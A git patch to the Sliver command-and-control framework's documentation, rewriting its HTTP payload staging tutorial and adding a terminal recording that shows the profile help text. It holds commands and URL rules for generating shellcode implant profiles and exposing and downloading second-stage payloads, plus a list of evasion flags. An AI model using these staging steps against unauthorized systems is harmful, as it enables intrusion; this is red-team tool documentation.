Docs = { docs: [] }; private _docsIndex: lunr.Index; + private _tutorials: Tutorials = { tutorials: [] }; + private _tutorialsIndex: lunr.Index; + constructor() { this._docsIndex = lunr(function () { this.ref("name"); this.field("content"); }); + this._tutorialsIndex = lunr(function () { + this.ref("name"); + this.field("content"); + }); } public searchDocs = (query: string): Doc[] => { @@ -34,6 +42,18 @@ export class SearchCtx { }); } + + public addTutorials = (tutorials: Tutorials) => { + this._tutorials = tutorials; + this._tutorialsIndex = lunr(function () { + this.ref("name"); + this.field("content"); + tutorials.tutorials.forEach((tutorial) => { + this.add(tutorial); + }); + }); + } + } export const SearchContext = React.createContext(new SearchCtx()); From 092633948217ba867c2706e6824d572a17d7eb33 Mon Sep 17 00:00:00 2001 From: Tim Makram Ghatas <47985652+TimBF@users.noreply.github.com> Date: Thu, 2 May 2024 20:10:59 +0200 Subject: [PATCH 3/7] update http staging wiki page --- .../tutorials/md/4 - HTTP Payload staging.md | 31 +- .../public/asciinema/create_profile.cast | 865 ++++++++++++++++++ .../public/asciinema/implant_curl.cast | 88 ++ .../public/asciinema/stage_implant.cast | 163 ++++ docs/sliver-docs/public/tutorials.json | 2 +- 5 files changed, 1133 insertions(+), 16 deletions(-) create mode 100644 docs/sliver-docs/public/asciinema/create_profile.cast create mode 100644 docs/sliver-docs/public/asciinema/implant_curl.cast create mode 100644 docs/sliver-docs/public/asciinema/stage_implant.cast diff --git a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md index 9d1abd1431..a08eb528ae 100644 --- a/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md +++ b/docs/sliver-docs/pages/tutorials/md/4 - HTTP Payload staging.md @@ -2,34 +2,35 @@ When using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command. -For this exercise we will create a new beacon profile for linux, stage it and use a bash script to download and execute +For this exercise we will create a new beacon profile and prepare to stage it. +```asciinema +{"src": "/asciinema/create_profile.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` -[server] sliver > profiles new -b **%%LINUX_IPADDRESS%%** --format shellcode --skip-symbols --debug profile1 -[*] Saved new implant profile profile1 +If you look at the generated implant, you'll notice the `ID` field has been populated. When downloading your payload from the staging server your URL needs to be in the form of: +``` +https://sliver-ip/whatever.stager_file_ext?x=yourID ``` -The profile should now be available when listing them using `profiles` command. +There is a lot of flexibility in the form of this URL, the conditions for successfull staging are: +* The file extension needs to match the c2 profile's stager_file_ext +* There has to be a one character http url parameter +* The digits found in the ID need to match an implant ID, if your implant ID is 1234, abcd1234, 12beu34 are all valid values -``` -[server] sliver > profiles +To expose a payload externally you need to use the `implants stage` command and specifically select the implant to be exposed. - Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations -============== ============== =============== ======================= ======= ============ ============= ============= - profile1 session windows/amd64 [1] https://10.0.0.4 true EXECUTABLE disabled +```asciinema +{"src": "/asciinema/stage_implant.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` -A stage listener linked to the profile can now be created that will host your executable. +At this point we can try retrieving our implant, the ID is 19778. +```asciinema +{"src": "/asciinema/implant_curl.cast", "cols": "132", "rows": "14", "idleTimeLimit": 8} ``` -[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7200 --profile profile1 -[*] No builds found for profile profile1, generating a new one -[*] Job 1 (http) started -``` -Once thats done the stage listener will host the second stage payload on the URL when specifying a file with extension `.woff` . For example, by reaching out to: [http://localhost:7200/test.woff](http://localhost:7200/test.woff) you will see that it downloads the second stage payload. ## Metasploit diff --git a/docs/sliver-docs/public/asciinema/create_profile.cast b/docs/sliver-docs/public/asciinema/create_profile.cast new file mode 100644 index 0000000000..254a5166c6 --- /dev/null +++ b/docs/sliver-docs/public/asciinema/create_profile.cast @@ -0,0 +1,865 @@ +{"version": 2, "width": 214, "height": 53, "timestamp": 1714671110, "env": {"SHELL": null, "TERM": "xterm"}} +[0.0365, "o", "# "] +[2.300466, "o", "."] +[2.380231, "o", "/"] +[2.543769, "o", "s"] +[2.664655, "o", "l"] +[2.710474, "o", "i"] +[2.784952, "o", "v"] +[2.940238, "o", "e"] +[3.054768, "o", "r"] +[3.143601, "o", "-"] +[3.346318, "o", "s"] +[3.381649, "o", "e"] +[3.429149, "o", "r"] +[3.639049, "o", "v"] +[3.753495, "o", "e"] +[3.844406, "o", "r"] +[3.958467, "o", "\r\n"] +[5.236741, "o", "\u001b[31m\r\r\n \t ██████ ██▓ ██▓ ██▒ █▓▓█████ ██▀███\r\r\n\t▒██ ▒ ▓██▒ ▓██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒\r\r\n\t░ ▓██▄ ▒██░ ▒██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒\r\r\n\t ▒ ██▒▒██░ ░██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄\r\r\n\t▒██████▒▒░██████▒░██░ ▒▀█░ ░▒████▒░██▓ ▒██▒\r\r\n\t▒ ▒▓▒ ▒ ░░ ▒░▓ ░░▓ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░\r\r\n\t░ ░▒ ░ ░░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░\r\r\n\t░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░░ ░\r\r\n\t\t ░ ░ ░ ░ ░ ░ ░ ░\r\r\n\u001b[0m\r\nAll hackers gain dethrone\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mServer v1.5.39 - ba3893980d1ca5e4ae4089eb4c87e9f5ba389119 - \u001b[1mDirty\u001b[0m"] +[5.237725, "o", "\r\r\n\u001b[1m\u001b[36m[*] \u001b[0mWelcome to the sliver shell, please type 'help' for options\r\r\n"] +[5.241125, "o", "\r\n"] +[5.266567, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.269346, "o", "\u001b[1 q"] +[5.271167, "o", "\u001b[?25l"] +[5.271738, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[5.2723, "o", "\u001b[6n"] +[5.275121, "o", "\u001b[0m\u001b[0K\u001b[49m"] +[5.275246, "o", "\r\r\n"] +[5.275574, "o", "\u001b[0K"] +[5.276699, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[6.788234, "o", "\u001b[?25l\u001b[214D"] +[6.790111, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.80734, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.808757, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[6.864007, "o", "\u001b[?25l\u001b[214D"] +[6.866175, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.879664, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[6.880395, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[6.964547, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.974473, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[7.084477, "o", "\u001b[?25l\u001b[214D"] +[7.088105, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.10679, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.108605, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[7.135656, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.137017, "o", "\u001b[6n"] +[7.140486, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C"] +[7.141666, "o", "\u001b[?25h"] +[7.218402, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.231162, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[7.253952, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.254678, "o", "\u001b[6n"] +[7.2585, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.258616, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[7.31814, "o", "\u001b[?25l"] +[7.319311, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.323417, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D"] +[7.323716, "o", "\u001b[17C\u001b[?25h"] +[7.451357, "o", "\u001b[?25l"] +[7.46114, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.479007, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[10.141048, "o", "\u001b[?25l"] +[10.142557, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.144411, "o", "\u001b[6n"] +[10.171025, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.173669, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[10.381466, "o", "\u001b[?25l"] +[10.390374, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.397032, "o", "\u001b[6n"] +[10.422451, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[10.42505, "o", "\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[10.538693, "o", "\u001b[20D\u001b[9C"] +[10.546145, "o", "\u001b[6n"] +[10.563405, "o", "\u001b[214D\u001b[20C\u001b[0J"] +[10.564509, "o", "\u001b[214D\r\r\n"] +[10.56801, "o", "\u001b[0 q"] +[10.569272, "o", "\r\n"] +[10.58611, "o", "List existing profiles\r\n\r\n"] +[10.596051, "o", "Usage:\r\n profiles [flags]\r\n profiles [command]\r\n\r\nAvailable Commands:\r\n generate Generate implant from a profile\r\n info Details about a profile\r\n new Create a new implant profile (interactive session)\r\n rm Remove a profile\r\n stage Generate implant from a profile and encode or encrypt it\r\n\r\nFlags:\r\n -h, --help help for profiles\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n\r\nUse \" profiles [command] --help\" for more information about a command.\r\n"] +[10.597101, "o", "\r\n"] +[10.60964, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[10.609799, "o", "\u001b[1 q\u001b[?25l\u001b[214D"] +[10.609842, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.613317, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[11.040535, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.066449, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.06745, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[11.152457, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.162655, "o", "pr\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[11.244167, "o", "\u001b[?25l\u001b[214D"] +[11.254302, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.271271, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.272278, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[11.370374, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.386569, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.389331, "o", "\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[11.438756, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.439512, "o", "\u001b[6n"] +[11.443634, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.444767, "o", "\u001b[214D\u001b[1A\u001b[14D\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[11.503298, "o", "\u001b[?25l"] +[11.504461, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.516437, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[11.517279, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[11.585175, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.596624, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[11.597432, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[16D\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[11.608683, "o", "\u001b[?25l\u001b[214D"] +[11.609612, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.621584, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.622411, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C\u001b[214D\u001b[17C\u001b[?25h"] +[11.743096, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.756295, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[12.619447, "o", "\u001b[?25l\u001b[214D"] +[12.620109, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.632128, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mn\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[12.633364, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[12.741768, "o", "\u001b[?25l"] +[12.744192, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.764267, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mne\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[12.765676, "o", "\u001b[214D\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[12.80038, "o", "\u001b[?25l"] +[12.801503, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.804488, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[12.80556, "o", "\u001b[214D\u001b[1A\u001b[21D\u001b[9C\u001b[214D\u001b[21C\u001b[?25h"] +[12.88558, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.890427, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[22D\u001b[9C"] +[12.891981, "o", "\u001b[214D\u001b[22C\u001b[?25h"] +[13.753303, "o", "\u001b[?25l"] +[13.766002, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.803622, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.806077, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[23D\u001b[9C\u001b[214D\u001b[23C\u001b[?25h"] +[13.98862, "o", "\u001b[?25l"] +[13.999511, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.015394, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew \u001b[1m\u001b[38;05;244m-h\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[14.015849, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[24D\u001b[9C\u001b[214D\u001b[24C\u001b[?25h"] +[14.167148, "o", "\u001b[24D\u001b[9C\u001b[6n"] +[14.179375, "o", "\u001b[214D\u001b[24C\u001b[0J\u001b[214D\r\r\n"] +[14.182566, "o", "\u001b[0 q\r\n"] +[14.190363, "o", "\u001b[1mCommand:\u001b[0m new \r\n\u001b[1mAbout:\u001b[0m Create a new profile with a given name and options, a name is required.\r\n\r\n\u001b[1m\u001b[4m++ Profiles ++\u001b[0m\r\nProfiles are an easy way to save an implant configuration and easily generate multiple copies of the binary with the same\r\nsettings. Generated implants will still have per-binary certificates/obfuscation/etc. This command is used with \"profiles generate\":\r\n\tprofiles new --mtls foo.example.com --canary 1.foobar.com my-profile-name\r\n\tprofiles generate my-profile-name\r\n\r\n"] +[14.198714, "o", "Usage:\r\n profiles new [flags]\r\n profiles new [command]\r\n\r\nAvailable Commands:\r\n beacon Create a new implant profile (beacon)\r\n\r\nFlags:\r\n -a, --arch string cpu architecture (default \"amd64\")\r\n -C, --c2profile string HTTP C2 profile to use (default \"default\")\r\n -c, --canary string canary domain(s)\r\n -d, --debug enable debug features\r\n -O, --debug-file string path to debug output\r\n -G, --disable-sgn disable shikata ga nai shellcode encoder\r\n -n, --dns string dns connection strings\r\n -e, --evasion enable evasion features (e.g. overwrite user space hooks)\r\n -E, --external-builder use an external builder\r\n -f, --format psexec Specifies the output formats, valid values are: 'exe', 'shared' (for dynamic libraries), 'service' (see: psexec for more info) and 'shellcode' (windows only) (default \"exe\")\r\n -h, --help help for new\r\n -b, --http string "] +[14.200627, "o", " http(s) connection strings\r\n -X, --key-exchange uint32 wg key-exchange port (default 1337)\r\n -w, --limit-datetime string limit execution to before datetime\r\n -x, --limit-domainjoined limit execution to domain joined machines\r\n -F, --limit-fileexists string limit execution to hosts with this file in the filesystem\r\n -z, --limit-hostname string limit execution to specified hostname\r\n -L, --limit-locale string limit execution to hosts that match this locale\r\n -y, --limit-username string limit execution to specified username\r\n -k, --max-errors uint32 max number of connection errors (default 1000)\r\n -m, --mtls string mtls connection strings\r\n -N, --name string agent name\r\n -p, --named-pipe string named-pipe connection strings\r\n -q, --netgo force the use of netgo\r\n -o, --os string operating system (default \"windows\")\r\n -P, --poll-timeout int long poll request timeout (d"] +[14.201749, "o", "efault 360)\r\n -j, --reconnect int attempt to reconnect every n second(s) (default 60)\r\n -R, --run-at-load run the implant entrypoint from DllMain/Constructor (shared library only)\r\n -s, --save string directory/file to the binary to\r\n -l, --skip-symbols skip symbol obfuscation\r\n -Z, --strategy string specify a connection strategy (r = random, rd = random domain, s = sequential)\r\n -T, --tcp-comms uint32 wg c2 comms port (default 8888)\r\n -i, --tcp-pivot string tcp-pivot connection strings\r\n -I, --template string implant code template (default \"sliver\")\r\n -A, --traffic-encoders string comma separated list of traffic encoders to enable\r\n -g, --wg string wg connection strings\r\n\r\nGlobal Flags:\r\n -t, --timeout int grpc timeout in seconds (default 60)\r\n\r\nUse \" profiles new [command] --help\" for more information about a command.\r\n\r\n"] +[14.21267, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[14.213731, "o", "\u001b[1 q\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.217195, "o", "\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[9D\u001b[9C\u001b[214D\u001b[9C\u001b[?25h"] +[14.7974, "o", "\u001b[?25l"] +[14.808382, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.844688, "o", "p\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[10D\u001b[9C\u001b[214D\u001b[10C\u001b[?25h"] +[14.968124, "o", "\u001b[?25l"] +[14.970056, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[14.996105, "o", "pr\u001b[0m\u001b[0K\u001b[49m"] +[14.998331, "o", "\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[11D\u001b[9C\u001b[214D\u001b[11C\u001b[?25h"] +[15.11977, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.120703, "o", "\u001b[6n"] +[15.133237, "o", "pro\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[12D\u001b[9C\u001b[214D\u001b[12C\u001b[?25h"] +[15.26931, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[15.281024, "o", "prof\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[15.281812, "o", "\u001b[214D\u001b[1A\u001b[13D\u001b[9C\u001b[214D\u001b[13C\u001b[?25h"] +[15.359607, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[15.370163, "o", "profi\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[14D"] +[15.371212, "o", "\u001b[9C\u001b[214D\u001b[14C\u001b[?25h"] +[15.429744, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[15.435967, "o", "profil\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[15.436611, "o", "\u001b[214D\u001b[1A\u001b[15D\u001b[9C\u001b[214D\u001b[15C\u001b[?25h"] +[15.465796, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.467731, "o", "\u001b[6n"] +[15.471173, "o", "profile\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[16D"] +[15.472014, "o", "\u001b[9C\u001b[214D\u001b[16C\u001b[?25h"] +[15.501393, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.502444, "o", "\u001b[6n"] +[15.505604, "o", "\u001b[1m\u001b[32mprofiles\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[17D\u001b[9C"] +[15.505705, "o", "\u001b[214D\u001b[17C\u001b[?25h"] +[15.616395, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[15.635045, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[15.636094, "o", "\u001b[214D\u001b[1A\u001b[18D\u001b[9C\u001b[214D\u001b[18C\u001b[?25h"] +[15.900778, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[15.915729, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mn\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[15.916362, "o", "\u001b[214D\u001b[1A\u001b[19D\u001b[9C\u001b[214D\u001b[19C\u001b[?25h"] +[15.983068, "o", "\u001b[?25l"] +[15.98517, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.006147, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mne\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[20D\u001b[9C\u001b[214D\u001b[20C\u001b[?25h"] +[16.042383, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[16.044936, "o", "\u001b[6n"] +[16.047739, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D"] +[16.048386, "o", "\u001b[1A\u001b[21D\u001b[9C\u001b[214D\u001b[21C\u001b[?25h"] +[16.133768, "o", "\u001b[?25l\u001b[214D"] +[16.137168, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.156809, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[22D\u001b[9C\u001b[214D\u001b[22C\u001b[?25h"] +[16.532633, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.549217, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew b\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.55055, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[23D\u001b[9C\u001b[214D\u001b[23C\u001b[?25h"] +[16.799275, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[16.803967, "o", "\u001b[6n"] +[16.838159, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew be\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[16.83983, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[24D\u001b[9C\u001b[214D\u001b[24C\u001b[?25h"] +[16.894586, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[16.899993, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew bea\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[25D\u001b[9C\u001b[214D\u001b[25C\u001b[?25h"] +[17.072821, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.085546, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beac\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[17.08708, "o", "\u001b[0J\u001b[214D\u001b[1A\u001b[26D\u001b[9C\u001b[214D\u001b[26C\u001b[?25h"] +[17.206672, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.219238, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beaco\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[27D\u001b[9C\u001b[214D\u001b[27C"] +[17.220783, "o", "\u001b[?25h"] +[17.251231, "o", "\u001b[?25l"] +[17.251404, "o", "\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[17.252544, "o", "\u001b[6n"] +[17.256117, "o", "\u001b[1m\u001b[32mprofiles \u001b[39m\u001b[22mnew beacon\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[17.256305, "o", "\u001b[0K\u001b[0J\u001b[214D\u001b[1A\u001b[28D\u001b[9C\u001b[214D\u001b[28C\u001b[?25h"] +[17.430255, "o", "\u001b[?25l\u001b[214D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.453164, "o", "\u001b[1m\u001b[32mprofiles 